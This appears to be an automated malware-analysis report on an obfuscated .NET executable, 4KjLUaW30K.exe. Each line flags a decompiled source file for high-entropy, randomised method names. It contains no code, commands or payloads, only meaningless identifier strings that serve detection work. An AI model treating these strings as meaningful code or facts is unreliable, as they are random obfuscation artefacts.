Source: 4KjLUaW30K.exe, lYy1RQvGli2tI4sZE1P.cs	High entropy of concatenated method names: 'vKhIFEbKhC', 'HRpI2n6CTd', 'jsXIR4PvFP', 'e1UIhoY4PG', 'FtMIu1pKYE', 'Qjy3JKQOPCXDirBIKOA', 'Lip3ZeQzjCK69AKpAku', 'l2dNmGQCpPGnkIo8kr2', 'tafuCUQFpyGdqOy5Fua', 'VhtTg9mtEWNE8stq2P9'
Source: 4KjLUaW30K.exe, SSDTYQvxTderYGV02mK.cs	High entropy of concatenated method names: 'uxk', 'q7W', '_327', '_958', '_4Oz', 'r6z', 'r7o', 'Z83', 'L5N', 'VTw'
Source: 4KjLUaW30K.exe, noEFuEoZtF0ih1MJAd2.cs	High entropy of concatenated method names: '_14Y', 'b41', 'D7Y', 'xMq', 'i39', '_77u', '_4PG', '_5u8', 'h12', '_2KT'
Source: 4KjLUaW30K.exe, BGQkiUYt4cL9WgcAMao.cs	High entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'GtaKDO4O6SXBLvvHQ4F', 'QL1xGN4z0Gm20CFIaey', 'BhMelVftPPk6Ixk4wfW', 'y9qNUSfwUaab4vTxcvB', 'CQX7IrfcUdEU5AycCOK', 'hjg4FcfKbixZmkKEc2E'
Source: 4KjLUaW30K.exe, TZRhjc3j8AVI92KwuP.cs	High entropy of concatenated method names: 'pHw', 'YZ8', 'v2R', 'G9C', 'jf2vR7T13LfN4SDiLmK', 'fdHHxKT9J8vqZT4k8vf', 'VEe9DwTHnmF6iups6yC', 'Ui9sBfT7CIU7nYD79E6', 'lhKHI4Tq538AC7KSgKM', 'BOALQTT3iGjgagAN1O7'
Source: 4KjLUaW30K.exe, zfXgCcvRD1gg8PMwoC0.cs	High entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'tgjW6iKNqr', '_3il', 'cPJWbxUspF', 'ej6WmdaJ6o', '_78N', 'z3K'
Source: 4KjLUaW30K.exe, VTe1WqQ6fv8ByODS1e.cs	High entropy of concatenated method names: 'PAKjujecx', 'W5yFfDmVT', 'N9F2s6nPJ', 'o8lI2ZwLAUHKqVQO4GP', 'iWafpfwUvyRmAvMZ9Sf', 'xAUsjWwxELifl1p1hsZ', 'AZOEKtwoynglCfffUif', 'xQ9cZTwEpPM4Th6RMu1', 'rSMZAOwvPU3tZS45RZk', 'RT3hNSwVuJuFadowy5N'
Source: 4KjLUaW30K.exe, R48lt4eCH3Oy6G2aIb.cs	High entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'dtaWGYcDuGcjKuyhIMq', 'd1HHi3cAFsrfqrMy3ya', 'W0OKWncZ5KW8lZD7cfi', 'chpjYqcpgslTS7ZE3J7', 'lynsglcYwf2WYkAPkhZ', 'GHtXJrcjemlmrx606WI'
Source: 4KjLUaW30K.exe, cXcRQdYBFmdZUVELXAG.cs	High entropy of concatenated method names: 'yiQ', 'YZ8', '_5li', 'G9C', 'mui3nb4t1037oJfoxZG', 'PbjHIG4wlZo0lTCGdo6', 'cBEJa24cMFojsEIEAKN', 'BS39lW4KvSxyHXGTIP1', 'hJgVps4Jaw2M7YeMOKN', 'iCQWuI4TXNsQxJccW48'
Source: 4KjLUaW30K.exe, WSVSP7oiICVvGc8XCjk.cs	High entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'mrkdB4I6AR', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
Source: 4KjLUaW30K.exe, vx3b5yYWpgBl8P2iF9p.cs	High entropy of concatenated method names: 'APumCymgdD', 'vTomBj9oIn', 'sxUmoWrTEp', 'zKvn6rADw75dLgB2skc', 'slPMb1AfZSBwCl9Cnk4', 'y1RrXpAgrZ3syhL7PaF', 'BMk1m5AAlkiIN2E9Qlf', 'wEjcGTAZwc3kr3meurE', 'FWBn4CApfRr4HX2geRd', 'wAR8tSAYdJLKuan4gqb'
Source: 4KjLUaW30K.exe, kfqrvqhb0xpH4vC6pmH.cs	High entropy of concatenated method names: 'sg9', 'RBa7bWKigx', 'KTrri8C4ab', 'u1e7mM3awP', 'piF1j6k5742xkbMFo79', 'sBTYtAkl6dI2VUMbPE3', 'PhfROvkP1lyR9PYD4Am', 'x4lxtikyJ4IQB2ob6CJ', 'WjqULEkRpLjNsGxcTpV', 'OVbrgQknnnHVVC5Kfao'
Source: 4KjLUaW30K.exe, txRtxjA81moWKs4PQ9.cs	High entropy of concatenated method names: '_88Z', 'YZ8', 'ffV', 'G9C', 'tAQmqNThZqo12AJe9u6', 'I5oaxCTyZ1FjGniXVCW', 'wfd2rrTRgXJMRHGd92s', 't1a6ptT5IYhEgrodY51', 'datkD3TlvkNTTW8dYQJ', 'yb4dRITP4VhjcfKfgQw'
Source: 4KjLUaW30K.exe, MyhoQnokJTBwKQQADqB.cs	High entropy of concatenated method names: 'F1RoSyO9hU', 'tTOog86Yde', 'AnQoqQ20YO', 'u1IbulxESUkFuP7c4vy', 'Xq2BbcxL2YtO8qWRK7w', 'YVQWIXxonDtYrvykCXe', 'dXD5gKxv0IWOlIRiph8', 'jP6drSxV7lVXOGZgQ4g', 'tMkm6tx8xZhOpl1dNIX', 'm8JhFSxhkT0hrEZ1OaN'
Source: 4KjLUaW30K.exe, iCP6ulhRSDDwPgOVtLp.cs	High entropy of concatenated method names: 'fWPr7SSIli', 'raLrtcbhhi', 'gST78tkMtZkj70hDLK1', 'Ww49AokSrZKVAB5GxnL', 'vAHi8GksFYpSFaq7T4o', 'lAuXVLkiLRsBiMrFsWG', 'M4l3pkke2Yw7vfUKOML', 'uXjvYQkX1vb5klP9EBo'
Source: 4KjLUaW30K.exe, V6dRp5Yxfuj08j3ek0a.cs	High entropy of concatenated method names: '_3fO', 'YZ8', '_48A', 'G9C', 'zhT7FXuunZ0v82LLZwM', 'VjsNTDu4blyo0BElOBY', 'uSTXyFuf4R0ktyQ55mQ', 'iQBQ90ugRyxHpFMq9t1', 'Vui5dCuD2Ygk2V4ntXa', 'FdJdIduArRbrdCGNG2Q'
Source: 4KjLUaW30K.exe, UBMW4nh645gfcZltu8q.cs	High entropy of concatenated method names: '_9YY', '_57I', 'w51', 'zOR7VYpIHp', '_168', 'j8ddRubQem7eLDPygdi', 'oaPICZbmFEeFmbdvS2c', 'OAxOqybrqN50k9tcVsy', 'UsvKvsb18LGSHjE2IbU', 'TrxO3bb9UtrU45lq96l'
Source: 4KjLUaW30K.exe, QFl6ClNMta2r0GnNZnF.cs	High entropy of concatenated method names: 'fRcOiwcgLg', 'wchONhAsaN', 'RtAmOVYSDZhqZYfTyyi', 'i9ZaB5Yer3gv10pSIey', 'RAEsk3YX26cAhGq2e38', 'aarZWsYWkBWo1usM1Uh', 'hTSNO5YkAK9NJ4EaO3r', 'rjRL3nYbl0vtjouSV28', 'TXB7viYGk2vyIyT83O4', 'nj39uiYQR8weiYbrPje'
Source: 4KjLUaW30K.exe, QVc8plospLEndviF8ek.cs	High entropy of concatenated method names: 'AYtL7XLTUQcD2L2NA1Z', 'fGPdErLduYPgkXbypf6', 'UJJW8ZLKCWc3N6EVYiX', 'bT5YRoLJSm6a2bBGNnZ', 'PgRVAmLugZdXeLXX2E3', 'yhOXqqL40GHC4yTOSkT', 'peXEUMLfWg5aQVvF69K'
Source: 4KjLUaW30K.exe, ryJsypNXZ9LmivXlBme.cs	High entropy of concatenated method names: 'w3jHkVcdr7', 'gfvsrAsFJWylLaowgcX', 'IWM2aRsONDe6I96glg0', 'NvRT9csBCEUhKrrh4wg', 'U9vYSSsCkrJRJLcPLPv', 'fMTojKszPLfxTNV8v8B', 'vjJdFMit5vGTkJIhIYq', 'KXQxYfiwqTJtkIyuMcx', 'pgEcp3icVAu9agLAAgJ', 'adPK9ViKq0bvXa4Ms8h'
Source: 4KjLUaW30K.exe, GtMNQ9oWjF5rokB7pEh.cs	High entropy of concatenated method names: 'FiCdvFVUva', 'Ay7dsTK0q8', 'F8e', 'bLw', 'U96', '_71a', 'O52', 'ya6dkATQle', '_5f9', 'A6Y'
Source: 4KjLUaW30K.exe, UZfeDWh352lf1WhI2wp.cs	High entropy of concatenated method names: '_269', '_5E7', 'uFh71utEwK', 'Mz8', 'UUj7c2w2dM', 'JoDxxpbniKVKJkhe8dA', 'no678LbN06Asyq1SRVU', 'gFSSgtb0b7aqhxq33i9', 'tFhqAmb66Rl83glsqj2', 'VyOe5NbBFGot9Jq2ATN'
Source: 4KjLUaW30K.exe, dAM0ED6eKKxhqovOZX.cs	High entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'sjWBiTTd99mLNvFVb7R', 'ov70rmTuN0gqEflN0U8', 'F8FSt6T49KCm7Kuhebs', 'Ou26X0Tfm2IHUb9MO6J', 'N8Hya5TgbVJpjJrmgnI', 'C24CHrTDivKY8efo7SL'
Source: 4KjLUaW30K.exe, wXgP01pTMe3OFLIRrE.cs	High entropy of concatenated method names: '_52Y', 'YZ8', 'Eg4', 'G9C', 'FVeuX7qD3', 'b27UNkcSG5vr76rVhYy', 'hMJ457cemTpWu4t4pAV', 'q9HT8TcX73GbXNVIPaq', 'S4bNEUcW5QGQlrcNDEX', 'XG5natckqHFQJk2hA7a'
Source: 4KjLUaW30K.exe, zHthOwoU2H99wIGWGaM.cs	High entropy of concatenated method names: 'FmioTJplVA', 'uBkoedRi1E', 'HVEowuMh5u', 'YN5oZ1GTZh', 'kgSoydgTlH', 'POIoiZVRSY', 'QseI3fx5JOvy5t5Cqtj', 'V8XBsHxyZPrfvbDf3hq', 'nR205kxR3F13uAoZ24X', 'YcyKPVxlgZGMYalpL03'
Source: 4KjLUaW30K.exe, qWUFdgLPJ9XGvAyBIm.cs	High entropy of concatenated method names: '_23T', 'YZ8', 'ELp', 'G9C', 'Ev2YkNKBwH2NgqRlmYC', 'qlrmeoKCfL14dAuBR6A', 'pvJahOKFfYgBn3F1RxJ', 'DTF2CZKOuBtvxjbeirW', 'n2siasKzZ9rI4pctZhX', 'r2R0wRJtWikQHbaNJmY'
Source: 4KjLUaW30K.exe, G56Q3aYjrdEuFu5v4iR.cs	High entropy of concatenated method names: 'rRAbksCkAc', 'qA6i714iWrcodeJJLMk', 'WNae9V4MsFK4pq7GryL', 'llNpFx4a2nLd1jJkeE6', 'X53urV4sh90p7D9w6q3', 'TZuWKE4Su6491U3AQUc', 'gMKBY44e2oONnKngXRL', 'gnxLDF4X33AUh9e9TUZ', 'OOiEyi4WETcLE6Z1yqi', 'f28'
Source: 4KjLUaW30K.exe, RBD6wFhjy2wGJtRcNcy.cs	High entropy of concatenated method names: 'TCLr84Og1Y', 'TQgrcrXChp', 'g8yrUdm96b', 'cKDYi4W80GNCKXWNi4P', 'Oi0X6EWvVMZlE7AMV9g', 'UKYR1xWVVkAaGXrjGTQ', 'wAPxirWhlHgXP4MQ9s9', 'g7PrQVXsCV', 'f8dr4WpOAS', 'sc5rECpRZs'
Source: 4KjLUaW30K.exe, Bkav7OY7VINUKrFphcS.cs	High entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'x2ElRj4R9pabdYEHETn', 'lLi8BT45JKgvKNaMEo4', 'RbfW5e4lQhPSh5jNejb', 'u7JAJW4P6F8tVPAMDid', 'XW1cSg4nNJ9fslb7xbn', 'o52i3b4N3pGSYpr4VPQ'
Source: 4KjLUaW30K.exe, KJqbCiNLCBjBf6h1Qyi.cs	High entropy of concatenated method names: 'YtKQEZyJlB', 'xqRQr8JiCi', 'WOJunMi6qJ4KLWi1378', 'PK16MviB9JnunZMMlNB', 'AGWXWXiNYlDfHRm0WXp', 'M54gEYi0h01K5XxidOl', 'IhEQUuBK06', 'F3PJqlMtX7CoCfQrHlb', 'OaGXGkMwaUZxMa4nJyq', 'SdWm1LiOQItAwiVaYUe'
Source: 4KjLUaW30K.exe, EdEYWwVqYP6pZ9APAub.cs	High entropy of concatenated method names: 'lw1kCqugYC', '_1kO', '_9v4', '_294', 'SmAkBKVmXI', 'euj', 'Mxyko3XE9G', 'zLAkdeewwZ', 'o87', 'z1wkPZ6Xrh'
Source: 4KjLUaW30K.exe, vZIQUINSw5pKTm7SZuU.cs	High entropy of concatenated method names: 'eNGnWuXnS5', 'B9En1XHfAo', 'fsTsDCjGuuRfVulcpZP', 'f0MPbjjQNJrbQW9uE0P', 'qNikBDjkEjiQeu13aI0', 'pJ4owjjbwt2C8Ly4oMQ', 'hNmi1JjmOBfKHKECeO1', 'PgN5cujryJEMtGcpUWq', 'OyKBbCj16RPjC81CPpb', 'iBdtmVj9SgYXIJsFgwP'
Source: 4KjLUaW30K.exe, UibesEvlqBKHivm7nup.cs	High entropy of concatenated method names: 'fdm0t9kLT7', 'LHi0jZATkg', 'ewW0FkfS46', 'J9c02PvvDu', 'RSn0RnB1fd', 'gSXIahmIHRxecuAaPHe', 'PiqbwDmUxSSNran9Wd7', 'TrGv8Em3BhixP73vQIX', 's5W9Otm2XsMXTqbERVG', 'WXqNemmx2fd4eRvwfsl'
Source: 4KjLUaW30K.exe, tDGifrgvT5UcySYpdI.cs	High entropy of concatenated method names: '_59M', 'YZ8', '_1zA', 'G9C', 'cmgEWjKUVrV37NjGKRV', 'wOIH3eKxo7uYSrE6xib', 'R5BZhlKLOcJAOXQpNwk', 'VWcT6IKooefh5Pe1Sa4', 'UHpHBcKEoGBBMtYFiCE', 'WdD1WMKvHFt6BUHYKUD'
Source: 4KjLUaW30K.exe, HWFQk8NwpxJpfT758VC.cs	High entropy of concatenated method names: 'faMOZ6k95W', 'pplfGJYKDq2se3bSljL', 'X5A2x0YJbEONNHmkH38', 'm6wIWqYwbRmiAj6FYuf', 'URRC52YcgQOCSSqowV8', 'Pdy6IUYTrysiy6JfkGI', 'fbHoeMYdHI31dKHqhj3', 'NBXukoYuvPnFUNr9ZRP', 'ooQ4sVY4KrJmKujSYTN', 'mUQVClYf9SWd3S1DhCD'
Source: 4KjLUaW30K.exe, NOPLVwY9MfD4AfFGHpJ.cs	High entropy of concatenated method names: '_7v4', 'YZ8', '_888', 'G9C', 'RPkLlpDq8HFPTfoevlW', 'h0ODQxD344GFmaYFd2Z', 'vobGmqD2bHjGRvsKPqp', 'pJ2vxUDIkPaLSolVRsX', 'LR7nUQDUGJjJI7Mwv6K', 'NZbB4dDxVFyDWMDcLQM'
Source: 4KjLUaW30K.exe, vUoheHY8wOZQoIG9xMg.cs	High entropy of concatenated method names: '_6U6', 'YZ8', '_694', 'G9C', 'CFlbmZuSxEJ2PL4ngHS', 'ptWlBxuef195RmNBaf0', 'SntJM5uX048lO76gOM8', 'Wv2uXGuWmYI7vBGtjun', 'dqjElWukXNEMtpx0YCM', 'klWhGaubnrklmoY57rV'
Source: 4KjLUaW30K.exe, yB1t4PNxmGUAD4XHP1t.cs	High entropy of concatenated method names: 'fbrO7TvBsL', 'UsLOt232B5', 'bCNOjPtfHL', 'fEQOFI6TvB', 'uUaO2hOP6L', 'ralORm9lr8', 'HiwOhoEeX2', 'b14G1lpGpeUJPKqBKKU', 'hULNxkpkWcHAvUy6Qt3', 'JEJAkLpbeehFkQL3lkq'
Source: 4KjLUaW30K.exe, FmGS1khGaFOQXlbKwnr.cs	High entropy of concatenated method names: '_223', 'HE3B63Xi7he89diCqDA', 'bOyZOcXMR4ueL4NOfbh', 'xNMhsCXS6VTxFkLaACo', 'KZQrxZXeR7LuKZsaJNw', 'GOrYAuXXEWmNX9ODLrA', 'WMU4gvXWSqshJwDOSyL', 'UHGkwAXkUtA30h0YQTV', 'eL46uFXb8Sb3opgG1J8', 'iFB0F1XGAlZrhyuo6OU'
Source: 4KjLUaW30K.exe, ruvAvkVnoUMmYw94IgV.cs	High entropy of concatenated method names: 'BO9Kr4VUQW', 'IVoKVyxSNY', 'fDhK3iD9D5', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'udrKIyBc7k'
Source: 4KjLUaW30K.exe, aDkKhnIWvc0qVL2oqa.cs	High entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'RiKMPUcF2RCaEjnSiO9', 'eBFFY3cOsYc3ghrYu33', 'Nes7nEczmOoSZFrnjVg', 'fTZ88uKtrPmm33pAn5x', 'HGGB6DKwwabXfw7O9Qw', 'hIiPwYKcuQ28wSVksHA'
Source: 4KjLUaW30K.exe, UFqogdYkuehTYh8Iphd.cs	High entropy of concatenated method names: 'VawbDX8vfI', 'j6grTegcoZiZCt0lxaF', 'Co8lJsgKvrY3N2WdfVZ', 'RaAW2UgtQRR35nZOpNU', 'B3SCiwgwawXwxxcjKqV', 'kbmiGdgJZArElZtfgTs', 'nAfQepgTr388RUrbuwt', 'cPh2tZgd26XuL0tx6Nc', 'PFFbSuSy0g', 'H0puHEgf5h1eoYAiKDV'
Source: 4KjLUaW30K.exe, l5xYCoNNdMvgNe1ZSSD.cs	High entropy of concatenated method names: 'cCFmSlNXWW', 'SwlmgqL6xO', 'RGomqn4sap', 'DROmX520Rq', 'Y91mTub7va', 'tVPmeRxHv3', 'PuM8wKZiuTeMwJ4559E', 'IvWYfYZMNxLIRti9CDm', 'uEet8LZaIYrNIjo8XtY', 'wMlF52ZsYSgo8Isq3HX'
Source: 4KjLUaW30K.exe, lJkRa7VVH3g1b2ugmn7.cs	High entropy of concatenated method names: 'Qkp', '_72e', 'R26', '_7w6', 'Awi', 'n73', 'cek', 'ro1', '_9j4', '_453'
Source: 4KjLUaW30K.exe, LjX5DMhF3iXAFYiUD2O.cs	High entropy of concatenated method names: 'oYo', '_1Z5', 'xaI74xN414', 'QRmVnWLesn', 'pUP7EJZ6ML', 'TvShyVbpi4RegB9SXyL', 'HhRWZ9bYgghELVWAxd6', 'Nv5G34bjWHAmjRaSyVh', 'g8GJeebaPuRmT2XbgYb', 'GCf957bsd4Gyyl89cyt'
Source: 4KjLUaW30K.exe, QgTJm9Yf7rn7degfOws.cs	High entropy of concatenated method names: 'y6fmbCvDpt', 'q2qmmlTR1c', 'in5mOxX6gj', 'spyDxSgncPm1ISRiZhA', 'SnpiNAgN5HYd10bquNS', 'SD7DuuglRhQriJQfKFL', 'cqhBJMgPWjQUwjSGGHd', 'CNRvp2g0sbmf631Nks8', 'XQPYgig6OKLuXflQMSF', 'w3enfTgB3YsHkoae4bu'
Source: 4KjLUaW30K.exe, f4jwlMvMT2PGg14hB0C.cs	High entropy of concatenated method names: 'VDm0ngFVQ1', 'oZv0HpsZEp', 'oW40QoDcge', 'e99lfDmstEuI3ELc2AA', 'r0Mry6miXDOZTZjH6Fu', 'tF4Y6FmjaUjHNKTkHkN', 'w5RY6GmaxOhXt1Ypuv0', 'jnkY01mMKHORe9uFUUa', 'CVtATUmSQR0isGINMEt', 'Id8YRtmeVZDclENyPPi'
Source: 4KjLUaW30K.exe, eGkaX4ohNpFNeK8GuW0.cs	High entropy of concatenated method names: 'mbnVNN3k6ZTryoMENqv', 'pEh8ko3bAldRJIBi6Le', 'qm78w23XXC5CKI2QP8q', 'z8o2DK3WLTDM1OoZxTa', 'WJeloR7pb1', 'DsMIMi3mkvPZ8PnrAlm', 'zg8TUs3rjt7tJ3hcvds', 'zMfhr13G51voqXorV8c', 'z8EBBW3QKKAJGcjLMtm', 'vxEOtK31Eh1O9NdDO6o'
Source: 4KjLUaW30K.exe, L51LOHYhmkeHGDgBwYi.cs	High entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'zTrh0qdHdHTXge7eUE4', 'e3fnohd7sSpZVZLYTbR', 'aHLdxEdqoln8iX2AsqP', 'Pxs37Hd3Pl5wfdrw3Vm', 'nMPrjFd2uPbZdaVoeDJ', 'GZBlKydInONhePyniVI'
Source: 4KjLUaW30K.exe, ro97oDVuP8MRY6VDPO5.cs	High entropy of concatenated method names: 'PJ1', 'jo3', 'PyZkrgxT8n', 'NsGkVOPAHm', 'NiTk3LkAU0', 'EC9', '_74a', '_8pl', '_27D', '_524'
Source: 4KjLUaW30K.exe, m7AOddYYBHLKaXxNx0u.cs	High entropy of concatenated method names: 'tO4', 'YZ8', '_4kf', 'G9C', 'H6nLuKdSrPfFCOHL9M7', 'FskR1QdejrHdmFgAWgE', 'zI2vXfdX7Bx8d9X303u', 'L1N2xBdWgjkG79QtXKW', 'OBMmlAdkd8nQXiLbEQ8', 'khDnO0dbxcogwJw2lZC'
Source: 4KjLUaW30K.exe, DBx1HnV2WnrVt2OJGyF.cs	High entropy of concatenated method names: 'YSHdDfqNyH', 'fD4dprsNW0', 'XFndS3HFEy', 'IF6dgvx3qu', 'oSBdqOY4l3', 'ELVdXu398q', '_838', 'vVb', 'g24', '_9oL'
Source: 4KjLUaW30K.exe, Ix3CD7hz2XViRj9ALf4.cs	High entropy of concatenated method names: 'McdVvZTR8m', 'OMiVshPk38', 'aLaVktfNje', 'MSc3PcGvJKjSkQ3tyRy', 'iHm4EBGVUeyGa4R7X7e', 'I9ZGkDGomLVfeIa7mau', 'YDgjDCGEWVZTRehKviy', 'UjakEdG8Jajep6FkLtO', 'x97gb4Gh5VP11xHh3TX', 'EeWp6XGy8u991gsDllC'
Source: 4KjLUaW30K.exe, cgK5tx073ISY2GMw4Av.cs	High entropy of concatenated method names: 'bhHfodJfIg', 'I4jfd6DIlS', 'xH8fP2Co7t', 'GwdfKho5ix', 'sNafv4pw4C', 'p7rfsc4AAF', 'HIbfkU6tkL', 'vrUf54jieZ', 'r5PffQnuMd', 'uyLf7y7HqT'
Source: 4KjLUaW30K.exe, ioFwL1v8caA9ieoNYeJ.cs	High entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
Source: 4KjLUaW30K.exe, QdvVFvonJ8EHJd5eisu.cs	High entropy of concatenated method names: 'uL8oAuycva', 'S1loDDlgwy', 'CKjopgWJEP', 'bniwwRxIMeavPujc7Lx', 'R103rbx35oKeKksE1Vw', 'owVDdGx2Amttapu7DN9', 'nkPyv2xUTDaZO2NviDA', 'KIB4qJxx5G0QiL0kByu'
Source: 4KjLUaW30K.exe, WUVpqxvyRygJs1qU9gS.cs	High entropy of concatenated method names: 'o1QtMZmhne8tCOAgUix', 'El0Vvhmysuc9iRSCFhB', 'gm6bj9mR4BLph5tGWbf', 'c81w5LmVTwF2JlPni0y', 'wpsfAGm8vIlqyXKl2a1'
Source: 4KjLUaW30K.exe, aFsJ9BNaQQe4ARmMM03.cs	High entropy of concatenated method names: 'P9VOz5viWr', 'fBCn6AP0RB', 'OSGnb6qPWe', 'yk4nm6g4Mw', 'kMFnOx2TRI', 'WM3nnNP6sD', 'exhnHoI8qH', 'dW0nQSODGr', 'l7tn4N0ceE', 'taZnEnxWqJ'
Source: 4KjLUaW30K.exe, mn3GMyPpG7d9Sd2Ib0.cs	High entropy of concatenated method names: '_52U', 'YZ8', 'M5A', 'G9C', 'HvX5JuT0P0L3ENISi5y', 'tNxV5RT6PdvZXVFZtOR', 'gGVX7FTBtAvXphnQcSZ', 'PGegLlTChX30HQbxW4i', 'bEpaPoTFIMMamptVvXj', 'G011I8TOnINfxer3NiN'
Source: 4KjLUaW30K.exe, lkg8fQYgQoTlXZs27lw.cs	High entropy of concatenated method names: 'uVPbiVvnY8', 'RQxZe9gxXv9PlyCHny7', 'ANVKhXgLIQHpBQb7qsF', 'r7JDTfgIy29mJ6C8ce7', 'TTfEErgUIDdLfXEARlv', 'jJtw97goK7DWR7i6VUj', '_3Xh', 'YZ8', '_123', 'G9C'
Source: 4KjLUaW30K.exe, CvrVDt0VyUBWHJ8alr.cs	High entropy of concatenated method names: 'ihMWFXbtE', 'Eqy2NK3vpp1rHo6s8s', 'UDmlFI7FVatqQAWIEC', 'qRBaahqX24bf9Q0xRT', 'k2pIGt29DyZZjTEsfQ', 'SZAG5uIGqmsdywVCYp', 'VZJmm3DLq', 'eWvODj1Oq', 'uXWnFrFu6', 'ShlHfKgDk'
Source: 4KjLUaW30K.exe, DQ3NDiFO17MTmARerf.cs	High entropy of concatenated method names: 'P37', 'YZ8', 'b2I', 'G9C', 'oem9NJJ8Eu0Z9okC2ln', 'nT899bJhSVhqJCep13w', 'LospAnJyZJwcxJZrcfs', 'iPG7e3JRxlLJHBoYEdP', 'UoNffCJ5QBVx4epQIep', 'iKWuxuJlwqhEnAFye90'
Source: 4KjLUaW30K.exe, i2y7PFhOWho2UcX1fPj.cs	High entropy of concatenated method names: '_525', 'L97', '_3t2', 'UL2', '_6V2', '_968', 'qcONDtkpUtB5ppk9vMP', 'hIiAhUkYgVVLkCty2QG', 'p3j2RGkjBWTOrbnfPrU', 'rXlsipkamKqjmjygTNh'
Source: 4KjLUaW30K.exe, y2TLYTvtFeNuhVMFdsa.cs	High entropy of concatenated method names: 'IXAWtQiHSG', 'nAhWj2lG3x', 'yFuWFNsUh5', 'sb2W2yGZDS', 'RqRWRFXreA', 'TCAPb5rSZlm80n33O1C', 'd451qBriGVbtJkNQtPr', 'ebZHTBrMJ0NEjcL0gWc', 'bw1FJ7reiQtcllSLxkW', 'F11txDrXHgYwh9pGbRp'
Source: 4KjLUaW30K.exe, NunncDvaaNLkdtc3tU2.cs	High entropy of concatenated method names: '_7zt', 'XlU0av2GvX', 'MYY0lwCHH1', 'Yqv0JkhrhY', 'B1Y0LlUbd8', 'hJs0CpTQaY', 'QrJ0BNHqV0', 'kNfNlkmkpOLQlTNQGtE', 'Ib04f9mbhSjW7uQPx78', 'lvtBxFmX0Ks9XPncoBf'
Source: 4KjLUaW30K.exe, DtAqWTyjCiljRTrdGU.cs	High entropy of concatenated method names: 'CjlokXvqc', 'rLVd1mfgI', 'DeZPo9dM2', 'uFhKutEwK', 'vdTvBqQA3', 'UUjs2w2dM', 'yGEk4Cylm', 'YCfTCLw4pggRoZYAhjl', 'ymjCSLwfoQV45BIkue0', 'Je8JefwgoYYaFwTH0WW'
Source: 4KjLUaW30K.exe, aynC04VDjKkDqjcdke9.cs	High entropy of concatenated method names: 'Uwgg5p8Jd5w3rIJbtEd', 'S1QFrr8TrcAmRE3Geba', 'F7bWrh8c7kelM1eXfnS', 'mNt1ii8KIwEfI0J23w0', 'sDmKjo5EZu', 'WM4', '_499', 'YlmKFuSjkm', 'TcjK2OhQWI', 'J05KRlqYCC'
Source: 4KjLUaW30K.exe, ATfjckh9fVmW7HmlyIP.cs	High entropy of concatenated method names: '_3VT', 'O5t', '_1W5', 'EVMV3R4orF', 'rLV701mfgI', 'HBBVIbpchw', 'DeZ7Wo9dM2', 'YhFbt4bLEl2nhSamiG8', 'd89l9ZboHLDsCejnePb', 'jikTR5bUdp6KwpeBina'
Source: 4KjLUaW30K.exe, In2HXcVN9wxsAnCqVMp.cs	High entropy of concatenated method names: 'CrePEgqTUP', 'qcdPrF13AM', '_8r1', 'k73PVBTUS5', 'uQJP3y0j5Q', 'xkdPIjTHYY', 'g1PP0PMCGw', 'fURRSIEaaM45UyKEpJa', 'mG1AudEsI73tO7rsAK4', 'yQUqYjEiG38IawuNPGR'
Source: 4KjLUaW30K.exe, FU1X10NWvKNOjTcC2nM.cs	High entropy of concatenated method names: 'gN64dglan8', 'm91uQ1MPrh07iLaVrDg', 'GHoNVqM5PvTpMBnBruH', 'kOqTijMlq5vfNM8ESMh', 'aC67hhMnT9QW3YxmHeM', 'hVMTJJMNkPhNID5HTjr', 'rRR4GNXMjy', 'wsX4apAjCs', 'tZd4lWsyRw', 'Sli4JHnIW1'
Source: 4KjLUaW30K.exe, EC6tmKYFR1lQypjwusk.cs	High entropy of concatenated method names: 'TJUm35uJ8w', 'CwFmI5L5Fe', 'kF9ZvbDA8MGLGUN2inr', 'pQpAOHDg1vFDpqdcpGI', 'g1UQjyDDk21latNkXRD', 'MdVTWpDZg1MTHPwGlqU', 'bk39VdDpLfEYmEZWcib', 'dqajbTDYDZx18rd167P', 'MyV3yrDjflSq7eve4if', 'IInUo0Da0sW0Elay583'
Source: 4KjLUaW30K.exe, K6waluVpfIvquEd1qvm.cs	High entropy of concatenated method names: '_159', 'rI9', '_2Cj', 'T8UKdTHhVC', 'ebyKPAHIfJ', 'G2hKK3jZxb', 'AtJKv92d7j', 'AsBKs3rQDs', 'w08KkG9hCr', 'oINDWxVxHBeHE3BHYpZ'
Source: 4KjLUaW30K.exe, mFIbZKVrbMDQqEPTYXE.cs	High entropy of concatenated method names: 'g43sRTMwLD', 'EmHYZw8HPXO1pYsXSPS', 'KIogXG87rXO2kUHBCZE', 'EbMNPn81KTBMacqrMv8', 'jmOl0989OpjvvfJDbYo', '_1fi', 'BwWvXTxBsh', '_676', 'IG9', 'mdP'
Source: 4KjLUaW30K.exe, qVycdWNnytWDx624cS0.cs	High entropy of concatenated method names: 'zoFnibXSnZ', 'ebonNx7sgZ', 'U5xnzEa44Y', 'cFKH6vFfWL', 'NWHHb2CMK5', 'ztpHmUTtyO', 'S7LHOWlYGN', 'zWoHnGkLpF', 'bMFHHI9Eje', 'Arew4Ra6sKThxRiDpQh'
Source: 4KjLUaW30K.exe, Y9NpIshBHL4JO7SnlPl.cs	High entropy of concatenated method names: 'PWQET0Pmyg', 'LUaEeAPLSd', 'DupEwCNl5N', 'RqREZULZ1y', 'IAhEyvABNU', 'XWeZSPWdkGjlbph5HFi', 'IBhGiiWu1GA0LRS8cMn', 'M9OAkQWJLgwVtd40gHh', 'WFobjQWTbc3VJJkuFU2', 'ew3do9W4gmgXVZKc2el'
Source: 4KjLUaW30K.exe, cEysALYXdvyMaKji4lm.cs	High entropy of concatenated method names: 'It0be5mNyZ', 'H82xFBgGZ5itCco9RXp', 'YGGW2HgQrlrqNG8pBGG', 'qZZfbogkEhA3Ldj1WVp', 'X3jWTUgbXERTtNLXwBY', 'QsEHn5gmJr13MaVVIDP', 'QLw', 'YZ8', 'cC5', 'G9C'
